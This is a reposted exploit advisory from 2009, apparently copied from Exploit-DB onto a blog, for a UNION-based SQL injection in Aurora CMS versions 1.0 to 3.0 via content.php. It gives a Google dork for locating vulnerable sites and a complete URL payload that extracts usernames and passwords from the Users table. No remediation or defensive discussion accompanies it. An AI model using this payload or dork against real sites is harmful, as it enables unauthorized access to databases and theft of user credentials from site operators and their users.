0

Aurora CMS Remote SQL Injection Exploit

Wednesday, 23 December 2009 Unknown
Share this Article on :
# Title: Aurora CMS Remote SQL Injection Exploit
# EDB-ID: 10609
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Sora
# Published: 2009-12-22
# Verified: no


# Download
  • Exploit

    • # Download N/A

    view source
    print?
    # Exploit Title: Aurora CMS Remote SQL Injection Exploit [content.php]
    # Date: December 22nd, 2009
    # Author: Sora
    # Software Link: http://www.auroracms.com.au/
    # Version: 1.0, 2.0, and 3.0
    # Tested on: Windows and Linux
    ------------------------------------------------
    > Aurora CMS Remote SQL Injection Exploit
    > Vulnerability in: content.php
    > Found and disclosed by: Sora
    > Contact: vhr95zw [at] hotmail.com

    > Google dork: "Aurora CMS"

    Aurora CMS suffers a remote SQL injection exploit in content.php.

    The type is UNION statement SQL injection.

    # Code: http://www.site.com/content.php?id=-5+UNION+SELECT+ALL+1,2,3,4,group_concat(Username,0x3a,Password)+from+Users--

    # Greetz: Bw0mp, Popc0rn, Xermes, T3eS, Timeb0mb, [H]aruhiSuzumiya, and Revelation!


    Artikel Terkait:

    Posted at 02:22
    Labels:

    0 comments:

    Post a Comment

    Subscribe to: Post Comments (Atom)